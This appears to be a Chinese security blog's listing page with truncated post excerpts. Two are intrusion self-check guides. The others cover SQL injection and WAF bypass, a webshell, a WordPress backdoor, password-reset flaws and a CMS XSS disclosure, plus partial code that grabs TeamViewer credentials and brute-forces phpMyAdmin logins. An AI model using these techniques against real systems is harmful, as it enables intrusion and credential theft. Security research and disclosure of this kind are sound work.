快速自检电脑是否被黑客入侵过(Linux版)

之前写了一篇《快速自检电脑是否被黑客入侵过(Windows版)》, 这次就来写写Linux版本的。前言严谨地说, Linux只是一个内核, `GNU Linux`才算完整的操作系统, 但在本文里还是用通俗的叫法,把`Ubuntu`,`Debian`,`RedHat`,`CentOS`,`ArchLinux`等发行版都统称为`Linux`.本文里所说的方法不仅对Linux的发行版适用, 部分方法对`Mac OSX`操作系统也是适用的.异常的帐号和权限如果黑客曾经获得过命令运行的机会, 对方往往会想

快速自检电脑是否被黑客入侵过(Windows版)

我们经常会感觉电脑行为有点奇怪, 比如总是打开莫名其妙的网站, 或者偶尔变卡(网络/CPU), 似乎自己"中毒"了,但X60安全卫士或者X讯电脑管家扫描之后又说你电脑"非常安全", 那么有可能你已经被黑客光顾过了. 这种时候也许要专业的取证人员出场,但似乎又有点小提大作. 因此本文介绍一些低成本的自检方法, 对于个人用户可以快速判断自己是否已经被入侵过.1. 异常的日志记录通常我们需要检查一些可疑的事件记录, 比如:“Event log&nbsp

ecshop前台sql注入

过狗过云锁一句话

thum-4a471512647354.jpg

权限后门系列之一:手动打造WordPress权限后门

screen 2017-12-23 at 16.19.57.jpg

最新WAF注入绕过

1大小写变种
2使用SQL注释
3使用URL编码
4使用空字节
5使用嵌套过剥离
6使用非标准入口点
7避开自定义过滤器

嵌套注释非注释关键字绕过

一件获取运行中的TeamViewer的账号和密码(附源码)

#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <iostream>#pragma comment( lib, "kernel32" )#pragma comment( lib, "user32" )
 int status = 0;
 BOOL CALLBACK EnumMainTVWindow(HWND hwnd, LPARAM lParam){
        const int BufferSize = 1024;
        char BufferContent[BufferSize] = "";
        SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
       
        if (status == 1)
        {
                printf("%s\n", BufferContent);
                status = 0;
        }
 
        if (strstr(BufferContent, "Allow Remote Control") != NULL)


任意用户密码重置的10种姿势

以前安全测试最爱挖的就是任意用户密码重置,今天看了carry_your师傅在ichunqiu上的视频文字总结一下任意用户密码重置的10种姿势:1,短信验证码可爆破;视频案例中输入手机号码、图片验证码就可以获取短信验证码,并且新密码也是在一个页面中,但是输入短信验证码之后,后端有个请求会判断短信验证码是否正确,错误的话页面会有提醒。攻击者可以用这个请求来爆破验证码,获取到正确的短信验证码之后就可以重置任意用户密码了。缺陷主要是两个方面,第一,未对短信验证码的失效时间进行限制;第二,功能设计存在缺陷

phpmyadmin枚举工具

#!/usr/bin/env python# -*- coding: utf-8 -*-
# @Author: IcySun
# 脚本功能:暴力破解phpMyadmin密码

from Queue import Queue
import threading,sys
import requests

def use():
    print '#' * 50
    print '\t Crack Phpmyadmin root\'s pass'
    print '\t\t\t Code By: IcySun'
    print '\t python crackPhpmyadmin.py http://xx.com/phpmyadmin/ \n\t    (default user is root)'


鲶鱼CMS存储XSS漏洞披露

*本文原创作者:Deen,属于FreeBuf原创奖励计划,禁止转载概述Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统。这个cms是十月我和学长小胡子一起审计的。所以在这里声明下,洞是他找的,他不善言辞,授权给我来写文章。漏洞已提交给厂商,同意公开此漏洞。XSS漏洞点这里的版本是V4.6.0。出问题的地方是头像上传这个地方,这个cms以前爆过一枚任意文件删除漏洞也是这里。先注册一个普通用户登录,上传一张头像。上传成功后开启抓包,点击“头像保存”。抓到数据如下:修改:POST&nbsp